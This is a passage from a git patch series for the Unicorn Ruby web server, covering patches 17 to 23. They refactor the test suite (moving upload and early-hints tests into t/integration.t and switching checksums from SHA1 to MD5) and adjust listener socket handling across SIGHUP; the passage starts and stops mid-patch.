-t_begin "one megabyte + 1 byte file should be filesystem-backed" && {
-	echo >> $one_meg
-	resp="$(curl -T $one_meg -sSf http://$listen/tmp_class)"
-	test x$fs_class = x"$resp"
-}
-
-t_begin "killing succeeds" && {
-	kill $unicorn_pid
-}
-
-t_begin "check stderr" && {
-	check_stderr
-}
-
-t_done

[-- Attachment #18: 0017-tests-get-rid-of-sha1sum.rb-and-rsha1-sh-function.patch --]
[-- Type: text/x-diff, Size: 1255 bytes --]

From b47912160f2336dde3901e588cc23fb2c2f8d9dc Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:46 +0000
Subject: [PATCH 17/23] tests: get rid of sha1sum.rb and rsha1() sh function

These are no longer needed, since Perl has long included
Digest::SHA.
---
 t/bin/sha1sum.rb | 17 -----------------
 t/test-lib.sh    |  4 ----
 2 files changed, 21 deletions(-)
 delete mode 100755 t/bin/sha1sum.rb

diff --git a/t/bin/sha1sum.rb b/t/bin/sha1sum.rb
deleted file mode 100755
index 53d68ce..0000000
--- a/t/bin/sha1sum.rb
+++ /dev/null
@@ -1,17 +0,0 @@
-#!/usr/bin/env ruby
-# -*- encoding: binary -*-
-# Reads from stdin and outputs the SHA1 hex digest of the input
-
-require 'digest/sha1'
-$stdout.sync = $stderr.sync = true
-$stdout.binmode
-$stdin.binmode
-bs = 16384
-digest = Digest::SHA1.new
-if buf = $stdin.read(bs)
-  begin
-    digest.update(buf)
-  end while $stdin.read(bs, buf)
-end
-
-$stdout.syswrite("#{digest.hexdigest}\n")
diff --git a/t/test-lib.sh b/t/test-lib.sh
index e70d0c6..8613144 100644
--- a/t/test-lib.sh
+++ b/t/test-lib.sh
@@ -123,7 +123,3 @@ unicorn_wait_start () {
 	# no need to play tricks with FIFOs since we got "ready_pipe" now
 	unicorn_pid=$(cat $pid)
 }
-
-rsha1 () {
-	sha1sum.rb
-}

[-- Attachment #19: 0018-early_hints-supports-Rack-3-array-headers.patch --]
[-- Type: text/x-diff, Size: 4606 bytes --]

From 6ad9f4b54ee16ffecea7e16b710552b45db33a16 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:47 +0000
Subject: [PATCH 18/23] early_hints supports Rack 3 array headers

We can hoist out append_headers into a new method and use it in
both e103_response_write and http_response_write.

t/integration.t now tests early_hints with both possible
values of check_client_connection.
---
 t/integration.ru |  7 +++++++
 t/integration.t  | 47 ++++++++++++++++++++++++++++++++++++++++++-----
 2 files changed, 49 insertions(+), 5 deletions(-)

diff --git a/t/integration.ru b/t/integration.ru
index edc408c..dab384d 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -5,6 +5,11 @@
 # this goes for t/integration.t  We'll try to put as many tests
 # in here as possible to avoid startup overhead of Ruby.
 
+def early_hints(env, val)
+  env['rack.early_hints'].call('link' => val) # val may be ary or string
+  [ 200, {}, [ val.class.to_s ] ]
+end
+
 $orig_rack_200 = nil
 def tweak_status_code
   $orig_rack_200 = Rack::Utils::HTTP_STATUS_CODES[200]
@@ -81,6 +86,8 @@ def rack_input_tests(env)
     when '/env_dump'; [ 200, {}, [ env_dump(env) ] ]
     when '/write_on_close'; write_on_close
     when '/pid'; [ 200, {}, [ "#$$\n" ] ]
+    when '/early_hints_rack2'; early_hints(env, "r\n2")
+    when '/early_hints_rack3'; early_hints(env, %w(r 3))
     else '/'; [ 200, {}, [ env_dump(env) ] ]
     end # case PATH_INFO (GET)
   when 'POST'
diff --git a/t/integration.t b/t/integration.t
index 855c260..8433497 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -13,8 +13,16 @@ my $t0 = time;
 my $conf = "$tmpdir/u.conf.rb";
 open my $conf_fh, '>', $conf;
 $conf_fh->autoflush(1);
+my $u1 = "$tmpdir/u1";
+print $conf_fh <<EOM;
+early_hints true
+listen "$u1"
+listen "$host_port" # TODO: remove this requirement for SIGHUP
+EOM
 my $ar = unicorn(qw(-E none t/integration.ru -c), $conf, { 3 => $srv });
 my $curl = which('curl');
+my $fifo = "$tmpdir/fifo";
+POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
 my %PUT = (
 	chunked_md5 => sub {
 		my ($in, $out, $path, %opt) = @_;
@@ -102,6 +110,26 @@ $c = tcp_start($srv, 'GET /nil-header-value HTTP/1.0');
 is_deeply([grep(/^X-Nil:/, @$hdr)], ['X-Nil: '],
 	'nil header value accepted for broken apps') or diag(explain($hdr));
 
+my $ck_early_hints = sub {
+	my ($note) = @_;
+	$c = unix_start($u1, 'GET /early_hints_rack2 HTTP/1.0');
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 103\b!, 'got 103 for rack 2 value');
+	is_deeply(['link: r', 'link: 2'], $hdr, 'rack 2 hints match '.$note);
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 200\b!, 'got 200 afterwards');
+	is(readline($c), 'String', 'early hints used a String for rack 2');
+
+	$c = unix_start($u1, 'GET /early_hints_rack3 HTTP/1.0');
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 103\b!, 'got 103 for rack 3');
+	is_deeply(['link: r', 'link: 3'], $hdr, 'rack 3 hints match '.$note);
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 200\b!, 'got 200 afterwards');
+	is(readline($c), 'Array', 'early hints used an Array for rack 3');
+};
+$ck_early_hints->('ccc off'); # we'll retest later
+
 if ('TODO: ensure Rack::Utils::HTTP_STATUS_CODES is available') {
 	$c = tcp_start($srv, 'POST /tweak-status-code HTTP/1.0');
 	($status, $hdr) = slurp_hdr($c);
@@ -154,6 +182,7 @@ if ('bad requests') {
 # input tests
 my ($blob_size, $blob_hash);
 SKIP: {
+	skip 'SKIP_EXPENSIVE on', 1 if $ENV{SKIP_EXPENSIVE};
 	CORE::open(my $rh, '<', 't/random_blob') or
 		skip "t/random_blob not generated $!", 1;
 	$blob_size = -s $rh;
@@ -232,16 +261,24 @@ SKIP: {
 
 # SIGHUP-able stuff goes here
 
+if ('check_client_connection') {
+	print $conf_fh <<EOM; # appending to existing
+check_client_connection true
+after_fork { |_,_| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
+EOM
+	$ar->do_kill('HUP');
+	open my $fifo_fh, '<', $fifo;
+	my $wpid = readline($fifo_fh);
+	like($wpid, qr/\Apid=\d+\z/a , 'new worker ready');
+	$ck_early_hints->('ccc on');
+}
+
 if ('max_header_len internal API') {
 	undef $c;
 	my $req = 'GET / HTTP/1.0';
 	my $len = length($req."\r\n\r\n");
-	my $fifo = "$tmpdir/fifo";
-	POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
-	print $conf_fh <<EOM;
+	print $conf_fh <<EOM; # appending to existing
 Unicorn::HttpParser.max_header_len = $len
-listen "$host_port" # TODO: remove this requirement for SIGHUP
-after_fork { |_,_| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
 EOM
 	$ar->do_kill('HUP');
 	open my $fifo_fh, '<', $fifo;

[-- Attachment #20: 0019-test_server-drop-early_hints-test.patch --]
[-- Type: text/x-diff, Size: 1737 bytes --]

From 3e6bc9fb589fd88469349a38a77704c3333623e0 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:48 +0000
Subject: [PATCH 19/23] test_server: drop early_hints test

t/integration.t already is more complete in that it tests
both Rack 2 and 3 along with both possible values of
check_client_connection.
---
 test/unit/test_server.rb | 31 -------------------------------
 1 file changed, 31 deletions(-)

diff --git a/test/unit/test_server.rb b/test/unit/test_server.rb
index fe98fcc..0a710d1 100644
--- a/test/unit/test_server.rb
+++ b/test/unit/test_server.rb
@@ -23,17 +23,6 @@ def call(env)
   end
 end
 
-class TestEarlyHintsHandler
-  def call(env)
-    while env['rack.input'].read(4096)
-    end
-    env['rack.early_hints'].call(
-      "Link" => "</style.css>; rel=preload; as=style\n</script.js>; rel=preload"
-    )
-    [200, { 'content-type' => 'text/plain' }, ['hello!\n']]
-  end
-end
-
 class TestRackAfterReply
   def initialize
     @called = false
@@ -112,26 +101,6 @@ def test_preload_app_config
     tmp.close!
   end
 
-  def test_early_hints
-    teardown
-    redirect_test_io do
-      @server = HttpServer.new(TestEarlyHintsHandler.new,
-                               :listeners => [ "127.0.0.1:#@port"],
-                               :early_hints => true)
-      @server.start
-    end
-
-    sock = tcp_socket('127.0.0.1', @port)
-    sock.syswrite("GET / HTTP/1.0\r\n\r\n")
-
-    responses = sock.read(4096)
-    assert_match %r{\AHTTP/1.[01] 103\b}, responses
-    assert_match %r{^Link: </style\.css>}, responses
-    assert_match %r{^Link: </script\.js>}, responses
-
-    assert_match %r{^HTTP/1.[01] 200\b}, responses
-  end
-
   def test_after_reply
     teardown
 

[-- Attachment #21: 0020-t-integration.t-switch-PUT-tests-to-MD5-reuse-buffer.patch --]
[-- Type: text/x-diff, Size: 3740 bytes --]

From cb826915cdd1881cbcfc1fb4e645d26244dfda71 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:49 +0000
Subject: [PATCH 20/23] t/integration.t: switch PUT tests to MD5, reuse buffers

MD5 is faster, and these tests aren't meant to be secure;
they only check for data corruption.
Content-MD5 is also a supported HTTP trailer, and verifying
it here lets us obsolete other tests.

Furthermore, we can reuse buffers on env['rack.input'].read
calls to avoid malloc(3) and GC overhead.

Combined, these give roughly a 3% speedup for t/integration.t
on my system.
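The buffer-reuse pattern described above can be sketched in plain Ruby;
StringIO stands in for env['rack.input'], and the 16384-byte chunk size
mirrors the test app:

```ruby
require 'digest/md5'
require 'stringio'

input = StringIO.new('x' * 100_000) # stand-in for env['rack.input']
dig = Digest::MD5.new

# IO#read(maxlen, outbuf) refills the same String in place instead of
# allocating a fresh one per chunk, avoiding malloc(3)/GC churn.
buf = String.new
dig.update(buf) while input.read(16_384, buf)
puts dig.hexdigest
```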
---
 t/integration.ru   | 20 +++++++++++++++-----
 t/integration.t    |  5 ++---
 t/preread_input.ru | 17 ++++++++++++-----
 3 files changed, 29 insertions(+), 13 deletions(-)

diff --git a/t/integration.ru b/t/integration.ru
index dab384d..086126a 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -55,8 +55,8 @@ def env_dump(env)
 def rack_input_tests(env)
   return [ 100, {}, [] ] if /\A100-continue\z/i =~ env['HTTP_EXPECT']
   cap = 16384
-  require 'digest/sha1'
-  digest = Digest::SHA1.new
+  require 'digest/md5'
+  dig = Digest::MD5.new
   input = env['rack.input']
   case env['PATH_INFO']
   when '/rack_input/size_first'; input.size
@@ -68,11 +68,21 @@ def rack_input_tests(env)
   if buf = input.read(rand(cap))
     begin
       raise "#{buf.size} > #{cap}" if buf.size > cap
-      digest.update(buf)
+      dig.update(buf)
     end while input.read(rand(cap), buf)
+    buf.clear # remove this call if Ruby ever gets escape analysis
   end
-  [ 200, {'content-length' => '40', 'content-type' => 'text/plain'},
-    [ digest.hexdigest ] ]
+  h = { 'content-type' => 'text/plain' }
+  if env['HTTP_TRAILER'] =~ /\bContent-MD5\b/i
+    cmd5_b64 = env['HTTP_CONTENT_MD5'] or return [500, {}, ['No Content-MD5']]
+    cmd5_bin = cmd5_b64.unpack('m')[0]
+    if cmd5_bin != dig.digest
+      h['content-length'] = cmd5_b64.size.to_s
+      return [ 500, h, [ cmd5_b64 ] ]
+    end
+  end
+  h['content-length'] = '32'
+  [ 200, h, [ dig.hexdigest ] ]
 end
 
 run(lambda do |env|
diff --git a/t/integration.t b/t/integration.t
index 8433497..38a9675 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -27,7 +27,6 @@ my %PUT = (
 	chunked_md5 => sub {
 		my ($in, $out, $path, %opt) = @_;
 		my $bs = $opt{bs} // 16384;
-		require Digest::MD5;
 		my $dig = Digest::MD5->new;
 		print $out <<EOM;
 PUT $path HTTP/1.1\r
@@ -186,8 +185,8 @@ SKIP: {
 	CORE::open(my $rh, '<', 't/random_blob') or
 		skip "t/random_blob not generated $!", 1;
 	$blob_size = -s $rh;
-	require Digest::SHA;
-	$blob_hash = Digest::SHA->new(1)->addfile($rh)->hexdigest;
+	require Digest::MD5;
+	$blob_hash = Digest::MD5->new->addfile($rh)->hexdigest;
 
 	my $ck_hash = sub {
 		my ($sub, $path, %opt) = @_;
diff --git a/t/preread_input.ru b/t/preread_input.ru
index f0a1748..18af221 100644
--- a/t/preread_input.ru
+++ b/t/preread_input.ru
@@ -1,15 +1,22 @@
 #\-E none
-require 'digest/sha1'
+require 'digest/md5'
 require 'unicorn/preread_input'
 use Unicorn::PrereadInput
 nr = 0
 run lambda { |env|
   $stderr.write "app dispatch: #{nr += 1}\n"
   input = env["rack.input"]
-  dig = Digest::SHA1.new
-  while buf = input.read(16384)
-    dig.update(buf)
+  dig = Digest::MD5.new
+  if buf = input.read(16384)
+    begin
+      dig.update(buf)
+    end while input.read(16384, buf)
+    buf.clear # remove this call if Ruby ever gets escape analysis
+  end
+  if env['HTTP_TRAILER'] =~ /\bContent-MD5\b/i
+    cmd5_b64 = env['HTTP_CONTENT_MD5'] or return [500, {}, ['No Content-MD5']]
+    cmd5_bin = cmd5_b64.unpack('m')[0]
+    return [500, {}, [ cmd5_b64 ] ] if cmd5_bin != dig.digest
   end
-
   [ 200, {}, [ dig.hexdigest ] ]
 }

[-- Attachment #22: 0021-tests-move-test_upload.rb-tests-to-t-integration.t.patch --]
[-- Type: text/x-diff, Size: 12280 bytes --]

From 181e4b5b6339fc5e9c3ad7d3690b736f6bd038aa Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:50 +0000
Subject: [PATCH 21/23] tests: move test_upload.rb tests to t/integration.t

The overread tests are ported over, and checksumming alone
is enough to guard against data corruption.

Randomizing the size of `read' calls on the client side will
shake out any boundary bugs on the server side.
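The randomized-size read idea translates into a short self-check; this
sketch uses deterministic stand-ins for t/random_blob and the client
socket, mimicking the Perl side's `read($in, $buf, 999 + int(rand(0xffff)))`:

```ruby
require 'digest/md5'
require 'stringio'

src = Random.new(42).bytes(200_000)   # stand-in for t/random_blob
expect = Digest::MD5.hexdigest(src)

# Re-read the same data in randomly sized chunks; the resulting digest
# must be independent of where the chunk boundaries fall.
io = StringIO.new(src)
dig = Digest::MD5.new
while (buf = io.read(999 + rand(0xffff)))
  dig.update(buf)
end
puts(dig.hexdigest == expect ? 'ok' : 'boundary bug')
```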
---
 t/integration.t          |  32 ++++-
 test/unit/test_upload.rb | 301 ---------------------------------------
 2 files changed, 27 insertions(+), 306 deletions(-)
 delete mode 100644 test/unit/test_upload.rb

diff --git a/t/integration.t b/t/integration.t
index 38a9675..a568758 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -26,7 +26,6 @@ POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
 my %PUT = (
 	chunked_md5 => sub {
 		my ($in, $out, $path, %opt) = @_;
-		my $bs = $opt{bs} // 16384;
 		my $dig = Digest::MD5->new;
 		print $out <<EOM;
 PUT $path HTTP/1.1\r
@@ -36,7 +35,7 @@ Trailer: Content-MD5\r
 EOM
 		my ($buf, $r);
 		while (1) {
-			$r = read($in, $buf, $bs);
+			$r = read($in, $buf, 999 + int(rand(0xffff)));
 			last if $r == 0;
 			printf $out "%x\r\n", length($buf);
 			print $out $buf, "\r\n";
@@ -46,15 +45,15 @@ EOM
 	},
 	identity => sub {
 		my ($in, $out, $path, %opt) = @_;
-		my $bs = $opt{bs} // 16384;
 		my $clen = $opt{-s} // -s $in;
 		print $out <<EOM;
 PUT $path HTTP/1.0\r
 Content-Length: $clen\r
 \r
 EOM
-		my ($buf, $r, $len);
+		my ($buf, $r, $len, $bs);
 		while ($clen) {
+			$bs = 999 + int(rand(0xffff));
 			$len = $clen > $bs ? $bs : $clen;
 			$r = read($in, $buf, $len);
 			die 'premature EOF' if $r == 0;
@@ -192,8 +191,10 @@ SKIP: {
 		my ($sub, $path, %opt) = @_;
 		seek($rh, 0, SEEK_SET);
 		$c = tcp_start($srv);
-		$c->autoflush(0);
+		$c->autoflush($opt{sync} // 0);
 		$PUT{$sub}->($rh, $c, $path, %opt);
+		defined($opt{overwrite}) and
+			print { $c } ('x' x $opt{overwrite});
 		$c->flush or die $!;
 		($status, $hdr) = slurp_hdr($c);
 		is(readline($c), $blob_hash, "$sub $path");
@@ -205,6 +206,27 @@ SKIP: {
 	$ck_hash->('chunked_md5', '/rack_input/size_first');
 	$ck_hash->('chunked_md5', '/rack_input/rewind_first');
 
+	$ck_hash->('identity', '/rack_input', -s => $blob_size, sync => 1);
+	$ck_hash->('chunked_md5', '/rack_input', sync => 1);
+
+	# ensure small overwrites don't get checksummed
+	$ck_hash->('identity', '/rack_input', -s => $blob_size,
+			overwrite => 1); # one extra byte
+
+	# excessive overwrite truncated
+	$c = tcp_start($srv);
+	$c->autoflush(0);
+	print $c "PUT /rack_input HTTP/1.0\r\nContent-Length: 1\r\n\r\n";
+	if (1) {
+		local $SIG{PIPE} = 'IGNORE';
+		my $buf = "\0" x 8192;
+		my $n = 0;
+		my $end = time + 5;
+		$! = 0;
+		while (print $c $buf and time < $end) { ++$n }
+		ok($!, 'overwrite truncated') or diag "n=$n err=$! ".time;
+	}
+	undef $c;
 
 	$curl // skip 'no curl found in PATH', 1;
 
diff --git a/test/unit/test_upload.rb b/test/unit/test_upload.rb
deleted file mode 100644
index 76e6c1c..0000000
--- a/test/unit/test_upload.rb
+++ /dev/null
@@ -1,301 +0,0 @@
-# -*- encoding: binary -*-
-
-# Copyright (c) 2009 Eric Wong
-require './test/test_helper'
-require 'digest/md5'
-
-include Unicorn
-
-class UploadTest < Test::Unit::TestCase
-
-  def setup
-    @addr = ENV['UNICORN_TEST_ADDR'] || '127.0.0.1'
-    @port = unused_port
-    @hdr = {'Content-Type' => 'text/plain', 'Content-Length' => '0'}
-    @bs = 4096
-    @count = 256
-    @server = nil
-
-    # we want random binary data to test 1.9 encoding-aware IO craziness
-    @random = File.open('/dev/urandom','rb')
-    @sha1 = Digest::SHA1.new
-    @sha1_app = lambda do |env|
-      input = env['rack.input']
-      resp = {}
-
-      @sha1.reset
-      while buf = input.read(@bs)
-        @sha1.update(buf)
-      end
-      resp[:sha1] = @sha1.hexdigest
-
-      # rewind and read again
-      input.rewind
-      @sha1.reset
-      while buf = input.read(@bs)
-        @sha1.update(buf)
-      end
-
-      if resp[:sha1] == @sha1.hexdigest
-        resp[:sysread_read_byte_match] = true
-      end
-
-      if expect_size = env['HTTP_X_EXPECT_SIZE']
-        if expect_size.to_i == input.size
-          resp[:expect_size_match] = true
-        end
-      end
-      resp[:size] = input.size
-      resp[:content_md5] = env['HTTP_CONTENT_MD5']
-
-      [ 200, @hdr.merge({'X-Resp' => resp.inspect}), [] ]
-    end
-  end
-
-  def teardown
-    redirect_test_io { @server.stop(false) } if @server
-    @random.close
-    reset_sig_handlers
-  end
-
-  def test_put
-    start_server(@sha1_app)
-    sock = tcp_socket(@addr, @port)
-    sock.syswrite("PUT / HTTP/1.0\r\nContent-Length: #{length}\r\n\r\n")
-    @count.times do |i|
-      buf = @random.sysread(@bs)
-      @sha1.update(buf)
-      sock.syswrite(buf)
-    end
-    read = sock.read.split(/\r\n/)
-    assert_equal "HTTP/1.1 200 OK", read[0]
-    resp = eval(read.grep(/^X-Resp: /).first.sub!(/X-Resp: /, ''))
-    assert_equal length, resp[:size]
-    assert_equal @sha1.hexdigest, resp[:sha1]
-  end
-
-  def test_put_content_md5
-    md5 = Digest::MD5.new
-    start_server(@sha1_app)
-    sock = tcp_socket(@addr, @port)
-    sock.syswrite("PUT / HTTP/1.0\r\nTransfer-Encoding: chunked\r\n" \
-                  "Trailer: Content-MD5\r\n\r\n")
-    @count.times do |i|
-      buf = @random.sysread(@bs)
-      @sha1.update(buf)
-      md5.update(buf)
-      sock.syswrite("#{'%x' % buf.size}\r\n")
-      sock.syswrite(buf << "\r\n")
-    end
-    sock.syswrite("0\r\n")
-
-    content_md5 = [ md5.digest! ].pack('m').strip.freeze
-    sock.syswrite("Content-MD5: #{content_md5}\r\n\r\n")
-    read = sock.read.split(/\r\n/)
-    assert_equal "HTTP/1.1 200 OK", read[0]
-    resp = eval(read.grep(/^X-Resp: /).first.sub!(/X-Resp: /, ''))
-    assert_equal length, resp[:size]
-    assert_equal @sha1.hexdigest, resp[:sha1]
-    assert_equal content_md5, resp[:content_md5]
-  end
-
-  def test_put_trickle_small
-    @count, @bs = 2, 128
-    start_server(@sha1_app)
-    assert_equal 256, length
-    sock = tcp_socket(@addr, @port)
-    hdr = "PUT / HTTP/1.0\r\nContent-Length: #{length}\r\n\r\n"
-    @count.times do
-      buf = @random.sysread(@bs)
-      @sha1.update(buf)
-      hdr << buf
-      sock.syswrite(hdr)
-      hdr = ''
-      sleep 0.6
-    end
-    read = sock.read.split(/\r\n/)
-    assert_equal "HTTP/1.1 200 OK", read[0]
-    resp = eval(read.grep(/^X-Resp: /).first.sub!(/X-Resp: /, ''))
-    assert_equal length, resp[:size]
-    assert_equal @sha1.hexdigest, resp[:sha1]
-  end
-
-  def test_put_keepalive_truncates_small_overwrite
-    start_server(@sha1_app)
-    sock = tcp_socket(@addr, @port)
-    to_upload = length + 1
-    sock.syswrite("PUT / HTTP/1.0\r\nContent-Length: #{to_upload}\r\n\r\n")
-    @count.times do
-      buf = @random.sysread(@bs)
-      @sha1.update(buf)
-      sock.syswrite(buf)
-    end
-    sock.syswrite('12345') # write 4 bytes more than we expected
-    @sha1.update('1')
-
-    buf = sock.readpartial(4096)
-    while buf !~ /\r\n\r\n/
-      buf << sock.readpartial(4096)
-    end
-    read = buf.split(/\r\n/)
-    assert_equal "HTTP/1.1 200 OK", read[0]
-    resp = eval(read.grep(/^X-Resp: /).first.sub!(/X-Resp: /, ''))
-    assert_equal to_upload, resp[:size]
-    assert_equal @sha1.hexdigest, resp[:sha1]
-  end
-
-  def test_put_excessive_overwrite_closed
-    tmp = Tempfile.new('overwrite_check')
-    tmp.sync = true
-    start_server(lambda { |env|
-      nr = 0
-      while buf = env['rack.input'].read(65536)
-        nr += buf.size
-      end
-      tmp.write(nr.to_s)
-      [ 200, @hdr, [] ]
-    })
-    sock = tcp_socket(@addr, @port)
-    buf = ' ' * @bs
-    sock.syswrite("PUT / HTTP/1.0\r\nContent-Length: #{length}\r\n\r\n")
-
-    @count.times { sock.syswrite(buf) }
-    assert_raise(Errno::ECONNRESET, Errno::EPIPE) do
-      ::Unicorn::Const::CHUNK_SIZE.times { sock.syswrite(buf) }
-    end
-    sock.gets
-    tmp.rewind
-    assert_equal length, tmp.read.to_i
-  end
-
-  # Despite reading numerous articles and inspecting the 1.9.1-p0 C
-  # source, Eric Wong will never trust that we're always handling
-  # encoding-aware IO objects correctly.  Thus this test uses shell
-  # utilities that should always operate on files/sockets on a
-  # byte-level.
-  def test_uncomfortable_with_onenine_encodings
-    # POSIX doesn't require all of these to be present on a system
-    which('curl') or return
-    which('sha1sum') or return
-    which('dd') or return
-
-    start_server(@sha1_app)
-
-    tmp = Tempfile.new('dd_dest')
-    assert(system("dd", "if=#{@random.path}", "of=#{tmp.path}",
-                        "bs=#{@bs}", "count=#{@count}"),
-           "dd #@random to #{tmp}")
-    sha1_re = %r!\b([a-f0-9]{40})\b!
-    sha1_out = `sha1sum #{tmp.path}`
-    assert $?.success?, 'sha1sum ran OK'
-
-    assert_match(sha1_re, sha1_out)
-    sha1 = sha1_re.match(sha1_out)[1]
-    resp = `curl -isSfN -T#{tmp.path} http://#@addr:#@port/`
-    assert $?.success?, 'curl ran OK'
-    assert_match(%r!\b#{sha1}\b!, resp)
-    assert_match(/sysread_read_byte_match/, resp)
-
-    # small StringIO path
-    assert(system("dd", "if=#{@random.path}", "of=#{tmp.path}",
-                        "bs=1024", "count=1"),
-           "dd #@random to #{tmp}")
-    sha1_re = %r!\b([a-f0-9]{40})\b!
-    sha1_out = `sha1sum #{tmp.path}`
-    assert $?.success?, 'sha1sum ran OK'
-
-    assert_match(sha1_re, sha1_out)
-    sha1 = sha1_re.match(sha1_out)[1]
-    resp = `curl -isSfN -T#{tmp.path} http://#@addr:#@port/`
-    assert $?.success?, 'curl ran OK'
-    assert_match(%r!\b#{sha1}\b!, resp)
-    assert_match(/sysread_read_byte_match/, resp)
-  end
-
-  def test_chunked_upload_via_curl
-    # POSIX doesn't require all of these to be present on a system
-    which('curl') or return
-    which('sha1sum') or return
-    which('dd') or return
-
-    start_server(@sha1_app)
-
-    tmp = Tempfile.new('dd_dest')
-    assert(system("dd", "if=#{@random.path}", "of=#{tmp.path}",
-                        "bs=#{@bs}", "count=#{@count}"),
-           "dd #@random to #{tmp}")
-    sha1_re = %r!\b([a-f0-9]{40})\b!
-    sha1_out = `sha1sum #{tmp.path}`
-    assert $?.success?, 'sha1sum ran OK'
-
-    assert_match(sha1_re, sha1_out)
-    sha1 = sha1_re.match(sha1_out)[1]
-    cmd = "curl -H 'X-Expect-Size: #{tmp.size}' --tcp-nodelay \
-           -isSf --no-buffer -T- " \
-          "http://#@addr:#@port/"
-    resp = Tempfile.new('resp')
-    resp.sync = true
-
-    rd, wr = IO.pipe.each do |io|
-      io.sync = io.close_on_exec = true
-    end
-    pid = spawn(*cmd, { 0 => rd, 1 => resp })
-    rd.close
-
-    tmp.rewind
-    @count.times { |i|
-      wr.write(tmp.read(@bs))
-      sleep(rand / 10) if 0 == i % 8
-    }
-    wr.close
-    pid, status = Process.waitpid2(pid)
-
-    resp.rewind
-    resp = resp.read
-    assert status.success?, 'curl ran OK'
-    assert_match(%r!\b#{sha1}\b!, resp)
-    assert_match(/sysread_read_byte_match/, resp)
-    assert_match(/expect_size_match/, resp)
-  end
-
-  def test_curl_chunked_small
-    # POSIX doesn't require all of these to be present on a system
-    which('curl') or return
-    which('sha1sum') or return
-    which('dd') or return
-
-    start_server(@sha1_app)
-
-    tmp = Tempfile.new('dd_dest')
-    # small StringIO path
-    assert(system("dd", "if=#{@random.path}", "of=#{tmp.path}",
-                        "bs=1024", "count=1"),
-           "dd #@random to #{tmp}")
-    sha1_re = %r!\b([a-f0-9]{40})\b!
-    sha1_out = `sha1sum #{tmp.path}`
-    assert $?.success?, 'sha1sum ran OK'
-
-    assert_match(sha1_re, sha1_out)
-    sha1 = sha1_re.match(sha1_out)[1]
-    resp = `curl -H 'X-Expect-Size: #{tmp.size}' --tcp-nodelay \
-            -isSf --no-buffer -T- http://#@addr:#@port/ < #{tmp.path}`
-    assert $?.success?, 'curl ran OK'
-    assert_match(%r!\b#{sha1}\b!, resp)
-    assert_match(/sysread_read_byte_match/, resp)
-    assert_match(/expect_size_match/, resp)
-  end
-
-  private
-
-  def length
-    @bs * @count
-  end
-
-  def start_server(app)
-    redirect_test_io do
-      @server = HttpServer.new(app, :listeners => [ "#{@addr}:#{@port}" ] )
-      @server.start
-    end
-  end
-
-end

[-- Attachment #23: 0022-drop-redundant-IO-close_on_exec-false-calls.patch --]
[-- Type: text/x-diff, Size: 891 bytes --]

From 841b9e756beb1aa00d0f89097a808adcbbf45397 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:51 +0000
Subject: [PATCH 22/23] drop redundant IO#close_on_exec=false calls

Passing the `{ FD => IO }' mapping to #spawn or #exec already
ensures Ruby will clear FD_CLOEXEC on these FDs before execve(2).
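A quick standalone sketch (illustrative only, not part of this patch) of
the behavior relied on here: an IO passed via an `{ FD => IO }' mapping
to #spawn stays open across exec even when close-on-exec was set on it.

```ruby
require 'socket'
require 'rbconfig'

srv = TCPServer.new('127.0.0.1', 0)
srv.close_on_exec = true # would normally be closed across execve(2)

# the child fstat(2)s fd 3 and exits non-zero if the fd was closed;
# passing `3 => srv' makes Ruby clear FD_CLOEXEC before exec
pid = spawn(RbConfig.ruby, '-e', 'IO.for_fd(3, autoclose: false).stat',
            3 => srv)
Process.waitpid(pid)
puts $?.exitstatus # => 0
```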
---
 lib/unicorn/http_server.rb | 5 +----
 1 file changed, 1 insertion(+), 4 deletions(-)

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 348e745..dd92b38 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -472,10 +472,7 @@ def worker_spawn(worker)
 
   def listener_sockets
     listener_fds = {}
-    LISTENERS.each do |sock|
-      sock.close_on_exec = false
-      listener_fds[sock.fileno] = sock
-    end
+    LISTENERS.each { |sock| listener_fds[sock.fileno] = sock }
     listener_fds
   end
 

[-- Attachment #24: 0023-LISTEN_FDS-inherited-sockets-are-immortal-across-SIG.patch --]
[-- Type: text/x-diff, Size: 3229 bytes --]

From 6ff8785c9277c5978e6dc01cb1b3da25d6bae2db Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:52 +0000
Subject: [PATCH 23/23] LISTEN_FDS-inherited sockets are immortal across SIGHUP

When using systemd-style socket activation, consider the
inherited socket immortal and do not drop it on SIGHUP.
This means configs w/o any `listen' directives at all can
continue to work after SIGHUP.

I only noticed this while writing some tests in Perl 5 and
the test suite is two lines shorter to test this feature :>
---
 lib/unicorn/http_server.rb  | 7 ++++++-
 t/client_body_buffer_size.t | 1 -
 t/integration.t             | 1 -
 3 files changed, 6 insertions(+), 3 deletions(-)

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index dd92b38..f1b4a54 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
